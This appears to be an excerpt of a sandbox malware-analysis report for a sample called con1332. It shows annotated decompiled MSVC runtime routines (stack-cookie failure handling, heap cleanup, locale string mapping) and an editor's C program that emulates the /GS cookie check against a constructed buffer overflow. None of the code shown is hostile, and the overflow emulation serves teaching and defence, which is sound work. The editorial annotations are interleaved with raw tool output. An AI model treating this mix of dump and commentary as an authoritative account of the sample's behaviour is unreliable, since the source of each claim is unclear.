// which captures the registers into a CONTEXT record, fills an EXCEPTION_RECORD with
// 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN), calls IsDebuggerPresent, clears the unhandled
// exception filter, hands the record to UnhandledExceptionFilter and terminates the process.
// The IsDebuggerPresent call here is CRT boilerplate, not sample-specific anti-debugging;
// weigh it accordingly when counting anti-analysis indicators.
E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
	intOrPtr _v0;
	void* _v804;
	intOrPtr _v808;
	intOrPtr _v812;
	intOrPtr _t6;
	intOrPtr _t11;
	intOrPtr _t12;
	intOrPtr _t13;
	long _t17;
	intOrPtr _t21;
	intOrPtr _t22;
	intOrPtr _t25;
	intOrPtr _t26;
	intOrPtr _t27;
	intOrPtr* _t31;
	void* _t34;

	_t27 = __esi;
	_t26 = __edi;
	_t25 = __edx;
	_t22 = __ecx;
	_t21 = __ebx;
	_t6 = __eax;
	// ecx carries the cookie read back from the caller's frame; 0x422234 is the
	// process-wide __security_cookie (0x9dd62c7d in this dump).
	_t34 = _t22 -  *0x422234; // 0x9dd62c7d
	if(_t34 == 0) {
		asm("repe ret"); // cookie intact: return to the caller ("rep ret" is the AMD branch-predictor idiom; the decompiler renders the prefix as repe)
	}
	// Only reached on a cookie mismatch. Snapshot the general, segment and flags
	// registers into a static CONTEXT record (ContextFlags at 0x423ae8) for the report.
	 *0x423b98 = _t6;  // Eax
	 *0x423b94 = _t22; // Ecx
	 *0x423b90 = _t25; // Edx
	 *0x423b8c = _t21; // Ebx
	 *0x423b88 = _t27; // Esi
	 *0x423b84 = _t26; // Edi
	 *0x423bb0 = ss;
	 *0x423ba4 = cs;
	 *0x423b80 = ds;
	 *0x423b7c = es;
	 *0x423b78 = fs;
	 *0x423b74 = gs;
	asm("pushfd");
	_pop( *0x423ba8); // EFlags
	// Ebp/Eip/Esp are taken from the frame of the function whose cookie failed, not this one.
	 *0x423b9c =  *_t31; // Ebp: the caller's saved frame pointer (_t31 is the decompiler's unassigned stand-in for the frame pointer)
	 *0x423ba0 = _v0;    // Eip: the caller's return address
	 *0x423bac =  &_a4;  // Esp
	 *0x423ae8 = 0x10001; // ContextFlags = CONTEXT_CONTROL
	_t11 =  *0x423ba0; // 0x0
	 *0x423a9c = _t11;       // ExceptionAddress = Eip
	 *0x423a90 = 0xc0000409; // ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
	 *0x423a94 = 1;          // ExceptionFlags = EXCEPTION_NONCONTINUABLE
	// Copy the cookie and its complement (0x422238 holds the bitwise NOT of 0x9dd62c7d,
	// i.e. __security_cookie_complement) onto the stack so they appear in the crash dump.
	_t12 =  *0x422234; // 0x9dd62c7d
	_v812 = _t12;
	_t13 =  *0x422238; // 0x6229d382
	_v808 = _t13;
	 *0x423ae0 = IsDebuggerPresent(); // remembered as DebuggerWasPresent and re-read below
	_push(1);
	E004138FC(_t14); // consistent with _crt_debugger_hook(1); _t14 is a decompiler placeholder for eax, the pushed 1 is the real argument
	SetUnhandledExceptionFilter(0); // remove any filter the program installed so the default handler reports the fault
	_t17 = UnhandledExceptionFilter(0x41fb80); // 0x41fb80: EXCEPTION_POINTERS referencing the record and context filled in above
	if( *0x423ae0 == 0) {
		_push(1);
		E004138FC(_t17); // second hook call only when no debugger was attached at entry
	}
	return TerminateProcess(GetCurrentProcess(), 0xc0000409); // exit code STATUS_STACK_BUFFER_OVERRUN; this function never returns
}

Address column (collapsed): statements at 0x0040ce09, 0x0040ce0f and 0x0040ce11 (the cookie compare and return), then 0x00413644 through 0x0041373e (the failure handler).
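The routine above matches the MSVC /GS cookie check and its failure path. As an added example (editor's code, not from the sandbox report or the analysed sample), the C program below emulates that check in user mode: it reuses the two 32-bit constants the dump shows at 0x422234 and 0x422238, confirms they are bitwise complements as the CRT's __security_cookie and __security_cookie_complement are, and shows what an over-long copy into a cookie-protected buffer looks like to the epilogue check. The frame layout, the 16-byte buffer and the 'A'-filled input are constructed for the example, and the per-frame XOR with the frame address that real builds apply is left out so the values stay deterministic.

```c
/*
 * Added example (editor's, not from the sandbox report or the sample): a user-mode
 * emulation of the MSVC /GS stack-cookie check that E0040CE09 implements.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_STACK_BUFFER_OVERRUN 0xC0000409u   /* exception/exit code the handler uses */

/* The two globals the decompiled function reads, as seen in the dump. */
static const uint32_t g_security_cookie            = 0x9DD62C7Du;   /* 0x422234 */
static const uint32_t g_security_cookie_complement = 0x6229D382u;   /* 0x422238 */

/* __security_cookie_complement is ~__security_cookie. A cheap check that the two
 * values a function reads really are the CRT cookie pair and not unrelated constants. */
bool cookie_pair_is_consistent(uint32_t cookie, uint32_t complement)
{
    return (cookie ^ complement) == 0xFFFFFFFFu;
}

/* Constructed frame image (assumption for the example): a 16-byte local buffer,
 * then the cookie slot, then the saved return address, in the order /GS places them
 * so that a linear overflow hits the cookie before the return address. */
enum { BUF_LEN = 16, COOKIE_OFF = 16, RET_OFF = 20, FRAME_LEN = 24 };

typedef struct {
    uint8_t raw[FRAME_LEN];
} frame_t;

/* Prologue: store the cookie below the return address. */
void frame_init(frame_t *f, uint32_t cookie, uint32_t ret_addr)
{
    memset(f->raw, 0, FRAME_LEN);
    memcpy(f->raw + COOKIE_OFF, &cookie, sizeof cookie);
    memcpy(f->raw + RET_OFF, &ret_addr, sizeof ret_addr);
}

/* A copy into the local buffer with no length check: the bug /GS is meant to catch.
 * The clamp only keeps the emulation inside the frame image. */
void unchecked_copy(frame_t *f, const uint8_t *src, size_t n)
{
    if (n > FRAME_LEN) n = FRAME_LEN;
    memcpy(f->raw, src, n);
}

/* Epilogue: __security_check_cookie. Returns 0 when the cookie is intact and
 * STATUS_STACK_BUFFER_OVERRUN when __report_gsfailure would have been entered
 * (the real handler never returns: it records the register context, calls
 * IsDebuggerPresent, passes the record to UnhandledExceptionFilter and terminates). */
uint32_t security_check_cookie(const frame_t *f, uint32_t cookie)
{
    uint32_t slot;
    memcpy(&slot, f->raw + COOKIE_OFF, sizeof slot);
    return slot == cookie ? 0u : STATUS_STACK_BUFFER_OVERRUN;
}

/* Runs one copy of n bytes of 'A' (constructed input) through the emulated frame
 * and returns what the epilogue check decides. */
uint32_t run_copy(size_t n)
{
    frame_t f;
    uint8_t src[FRAME_LEN];
    memset(src, 'A', sizeof src);
    frame_init(&f, g_security_cookie, 0x00401000u);   /* return address is a placeholder */
    unchecked_copy(&f, src, n);
    return security_check_cookie(&f, g_security_cookie);
}

int main(void)
{
    printf("cookie pair consistent: %s\n",
           cookie_pair_is_consistent(g_security_cookie, g_security_cookie_complement) ? "yes" : "no");
    printf("16-byte copy -> 0x%08X\n", run_copy(16));   /* fits: 0x00000000 */
    printf("17-byte copy -> 0x%08X\n", run_copy(17));   /* one byte into the cookie: 0xC0000409 */
    printf("24-byte copy -> 0x%08X\n", run_copy(24));   /* cookie and return address overwritten: 0xC0000409 */
    return 0;
}
```

A 17-byte copy is the smallest overflow the check catches: it changes only the cookie's low byte, which is why the comparison is against the full 32-bit value rather than a prefix. In the real binary the caller stores `cookie ^ ebp` in the slot and XORs it back before the `cmp ecx, [__security_cookie]` at 0x0040ce09, so two frames never hold the same raw value; the emulation drops that step only to keep the numbers readable.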

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                     Uniqueness
                                                                                                                                                                                                                                     • Uniqueness Score: -1.00%
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 02C0395B
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C03970
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 02C0397B
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 02C03997
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 02C0399E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction ID: 4bb2fd2524325f1f97171cfd17261fc98ad2e92218bd90dfaeb189217573c187
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121D4B8B01204EFD720DF65E9496457FB4FB08356F8040BAE50D87662E7B86682CF4D
                                                                                                                                                                                                                                     Uniqueness
                                                                                                                                                                                                                                     • Uniqueness Score: -1.00%
                                                                                                                                                                                                                                     C-Code - Quality: 100%
                                                                                                                                                                                                                                     			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                     				void* _t5;
                                                                                                                                                                                                                                     				intOrPtr* _t11;
                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                     				_t11 = __ecx;
                                                                                                                                                                                                                                     				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                                                     				 *__ecx = 0x41eff0; // reset this object's vtable pointer (destructor-style prologue)
                                                                                                                                                                                                                                     				if(_t5 != 0) {
                                                                                                                                                                                                                                     					// call the third vtable entry (offset 8) of the member object at +8, passing the object itself; consistent with an IUnknown::Release()-style call
                                                                                                                                                                                                                                     					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                                                     				}
                                                                                                                                                                                                                                     				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                                                     					// free the heap buffer owned at +0xc on the process default heap
                                                                                                                                                                                                                                     					_t5 = GetProcessHeap();
                                                                                                                                                                                                                                     					if(_t5 != 0) {
                                                                                                                                                                                                                                     						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                                                     					}
                                                                                                                                                                                                                                     				}
                                                                                                                                                                                                                                     				return _t5;
                                                                                                                                                                                                                                     			}
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                     Uniqueness
                                                                                                                                                                                                                                     • Uniqueness Score: -1.00%
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                    				intOrPtr _t112;
                                                                                                                                                                                                                                    				intOrPtr _t113;
                                                                                                                                                                                                                                    				short* _t115;
                                                                                                                                                                                                                                    				short* _t116;
                                                                                                                                                                                                                                    				char* _t120;
                                                                                                                                                                                                                                    				short* _t121;
                                                                                                                                                                                                                                    				short* _t123;
                                                                                                                                                                                                                                    				short* _t127;
                                                                                                                                                                                                                                    				int _t128;
                                                                                                                                                                                                                                    				short* _t141;
                                                                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                                    				short* _t147;
                                                                                                                                                                                                                                    				signed int _t150;
                                                                                                                                                                                                                                    				short* _t153;
                                                                                                                                                                                                                                    				char* _t157;
                                                                                                                                                                                                                                    				int _t160;
                                                                                                                                                                                                                                    				long _t162;
                                                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                                                    				signed int _t179;
                                                                                                                                                                                                                                    				int _t182;
                                                                                                                                                                                                                                    				short* _t184;
                                                                                                                                                                                                                                    				signed int _t186;
                                                                                                                                                                                                                                    				signed int _t188;
                                                                                                                                                                                                                                    				short* _t189;
                                                                                                                                                                                                                                    				int _t191;
                                                                                                                                                                                                                                    				intOrPtr _t194;
                                                                                                                                                                                                                                    				int _t207;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                     				_t110 =  *0x422234; // 0x9dd62c7d, the CRT security cookie
                                                                                                                                                                                                                                     				_v8 = _t110 ^ _t188; // stack canary: cookie XOR frame pointer, verified before return
                                                                                                                                                                                                                                     				_t184 = __ecx;
                                                                                                                                                                                                                                     				_t194 =  *0x423e7c; // 0x1, cached flag recording whether LCMapStringW support has already been probed
                                                                                                                                                                                                                                     				if(_t194 == 0) {
                                                                                                                                                                                                                                     					_t182 = 1;
                                                                                                                                                                                                                                     					// probe whether LCMapStringW is implemented on this platform (0x100 = LCMAP_LOWERCASE); typical of the MSVC CRT locale-support check
                                                                                                                                                                                                                                     					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                                                     						_t162 = GetLastError();
                                                                                                                                                                                                                                     						__eflags = _t162 - 0x78;
                                                                                                                                                                                                                                     						if(_t162 == 0x78) { // 0x78 = ERROR_CALL_NOT_IMPLEMENTED
                                                                                                                                                                                                                                    							 *0x423e7c = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *0x423e7c = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a16 <= 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                                                    					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                    							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _a28;
                                                                                                                                                                                                                                    						if(_a28 == 0) {
                                                                                                                                                                                                                                    							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                                                    						_v24 = _t113;
                                                                                                                                                                                                                                    						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                                                    						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                                                    							__eflags = _t113 - _a28;
                                                                                                                                                                                                                                    							if(_t113 == _a28) {
                                                                                                                                                                                                                                    								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                                                    								L78:
                                                                                                                                                                                                                                    								__eflags = _v16;
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                    									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t115 = _v20;
                                                                                                                                                                                                                                    								__eflags = _t115;
                                                                                                                                                                                                                                    								if(_t115 != 0) {
                                                                                                                                                                                                                                    									__eflags = _a20 - _t115;
                                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                                    										_push(_t115);
                                                                                                                                                                                                                                    										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t116 = _t184;
                                                                                                                                                                                                                                    								goto L84;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                                                    							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                                                    							_v16 = _t120;
                                                                                                                                                                                                                                    							__eflags = _t120;
                                                                                                                                                                                                                                    							if(_t120 == 0) {
                                                                                                                                                                                                                                    								goto L58;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                                                    							_v12 = _t121;
                                                                                                                                                                                                                                    							__eflags = _t121;
                                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                                                    									L71:
                                                                                                                                                                                                                                    									_t182 = 0;
                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                    									L72:
                                                                                                                                                                                                                                    									__eflags = _t182;
                                                                                                                                                                                                                                    									if(_t182 == 0) {
                                                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                                                    									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                                                    									_v12 = _t123;
                                                                                                                                                                                                                                    									__eflags = _t123;
                                                                                                                                                                                                                                    									if(_t123 != 0) {
                                                                                                                                                                                                                                    										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                                                    										_v20 = _t186;
                                                                                                                                                                                                                                    										asm("sbb esi, esi");
                                                                                                                                                                                                                                    										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                                                    										__eflags = _t184;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t184 = 0;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									E004147AE(_t182);
                                                                                                                                                                                                                                    									goto L78;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                                                    								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                                                    									goto L71;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t127 =  &(_t121[4]);
                                                                                                                                                                                                                                    								__eflags = _t127 - 0x400;
                                                                                                                                                                                                                                    								if(_t127 > 0x400) {
                                                                                                                                                                                                                                    									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                                                    									__eflags = _t128;
                                                                                                                                                                                                                                    									if(_t128 != 0) {
                                                                                                                                                                                                                                    										 *_t128 = 0xdddd;
                                                                                                                                                                                                                                    										_t128 = _t128 + 8;
                                                                                                                                                                                                                                    										__eflags = _t128;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t182 = _t128;
                                                                                                                                                                                                                                    									goto L72;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								E0040CFB0(_t127);
                                                                                                                                                                                                                                    								_t182 = _t191;
                                                                                                                                                                                                                                    								__eflags = _t182;
                                                                                                                                                                                                                                    								if(_t182 == 0) {
                                                                                                                                                                                                                                    									goto L62;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								 *_t182 = 0xcccc;
                                                                                                                                                                                                                                    								_t182 = _t182 + 8;
                                                                                                                                                                                                                                    								goto L72;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L62:
                                                                                                                                                                                                                                    							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                                                    				if(_t160 < _a16) {
                                                                                                                                                                                                                                    					_t160 = _t160 + 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_a16 = _t160;
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0041711a
                                                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                                                    0x00417414
                                                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                                                    0x00417120
                                                                                                                                                                                                                                    0x00417126
                                                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                                                    0x00417130
                                                                                                                                                                                                                                    0x00417153
                                                                                                                                                                                                                                    0x00417155
                                                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                                                    0x004171a5
                                                                                                                                                                                                                                    0x004171a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171c1
                                                                                                                                                                                                                                    0x004172aa
                                                                                                                                                                                                                                    0x004172ad
                                                                                                                                                                                                                                    0x004172b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004172b5
                                                                                                                                                                                                                                    0x004171c7
                                                                                                                                                                                                                                    0x004171db
                                                                                                                                                                                                                                    0x004171dd
                                                                                                                                                                                                                                    0x004171e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171ef
                                                                                                                                                                                                                                    0x0041721a
                                                                                                                                                                                                                                    0x0041721c
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                                                    0x00417277
                                                                                                                                                                                                                                    0x0041727d
                                                                                                                                                                                                                                    0x0041727f
                                                                                                                                                                                                                                    0x00417281
                                                                                                                                                                                                                                    0x00417282
                                                                                                                                                                                                                                    0x00417283
                                                                                                                                                                                                                                    0x00417286
                                                                                                                                                                                                                                    0x0041728c
                                                                                                                                                                                                                                    0x0041728f
                                                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                                                    0x004172a0
